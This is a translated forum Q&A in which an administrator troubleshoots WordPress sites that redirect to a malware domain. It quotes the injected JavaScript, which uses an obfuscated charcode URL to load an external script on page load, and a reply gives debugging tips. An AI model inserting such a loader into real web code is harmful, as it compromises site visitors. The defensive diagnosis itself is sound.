4

我正在经历更糟糕的噩梦。我有一个 CentOS 服务器,它托管了 10 个 WordPress 网站。

我的客户注意到他们的网站正在打开,加载后它被重定向到 (fast.destinyfernandi.com) <---- 恶意软件网站。

我使用 ClamAV 来检测恶意软件并手动清理它们,但没有成功。

以下是其中一个网站的 Clamscan 命令结果示例:

----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)

但该网站仍在重定向到该恶意软件网站。

有没有人遇到过这样的问题?

请帮忙。

===================================已解决:============== ================

代码被注入到所有 js 文件中

var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
4

1 回答 1

2

有几种方法可以将您的网络资源重定向到命运费尔南迪。

  1. 可以修补数据库并且您自己的合法代码会重定向
  2. php 或 JS 或 html 模板中的一些注入代码确实通过 window.location 或 meta 或响应标头重定向。

首先发现你被重定向到的地址,无论是命运费尔南迪还是其他一些 URL。我的意思是你可能会被重定向到一些“不可见”的 URL1 和服务器,服务于 URL1 的服务器会将浏览器进一步重定向到命运费尔南迪。

一旦您发现重定向中的第一跳 (URL) 是什么,您就可以在源代码和数据库转储中搜索错误的 URL。

也有可能在您的代码中混淆了第一跳 URL(最有可能是命运费尔南迪),但希望情况并非如此。

您还可以添加在重定向时触发的断点,这可以帮助您识别混淆的 JS 代码:

window.addEventListener("beforeunload", function() { debugger; }, false)
于 2020-02-25T11:08:52.980 回答